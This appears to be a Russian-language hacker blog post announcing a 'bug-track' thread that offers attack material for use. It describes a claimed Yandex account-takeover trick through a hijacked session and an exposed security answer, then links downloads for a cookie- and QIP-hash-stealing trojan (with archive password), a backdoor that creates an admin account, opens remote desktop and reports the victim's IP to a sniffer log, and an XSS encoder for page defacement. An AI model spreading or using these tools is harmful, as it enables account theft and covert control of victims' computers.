Отыкрытие Буг трак ветки.
Собственно я решил открыть Bug-Track анонс в этом блоге.
Периодически, я буду добавлять различные уязвимости с разных ресурсов, разные разработки, программы и т.д.
1)
Уязвимость yandex.ru, теперь перехватив сессию вы можете легко поменять пароль не зная текущего, уязвимость найденна хакером Крысиный Яд в посл. странице регистрации где в открытом виде показываеться контрольный вопрос и овтет на него.
А зная ответ на контр вопрос, вы можете легко восстанеовить пароль и поменять его.
http://passport.yandex.ru/passport?mode=register&s...dq4g3q&ncrnd=221475&ncrnd=6548
2)
Новый троян, перехватывает хэши от квипа, перехватывает все кукисы и
отсылает всё дело на лог.
Упор в этой программе длелася на перехват кукисов, мне кажеться такого раньше не было.
http://hackmeplease.jino-net.ru/pcontrol.php
пароль "iffwhitehats"
3)
Троян типа Backdoor, создаёт учётку в группе администраторов и открывает на этом компьютере удалённое использование рабочего стола.
При открытие трояна отсылаеться на сниффер лог айпи с Query= Terminal.
Чтобы сразу узнать айпи у цели.
http://hackmeplease.jino-net.ru/Program.exe
создаёться учётная запись "IFF"
лог сниффера:
http://iffteam.com/sniffer/light.txt
4)
Для тех кто увлекаеться XSS атаками кодер, также есть посл. поле, создание псевдо-дефейса.
Кодирование в ASCII скрипта используя document.write , что приводит к подмене страницы.
http://mirinet.narod.ru/coder.exe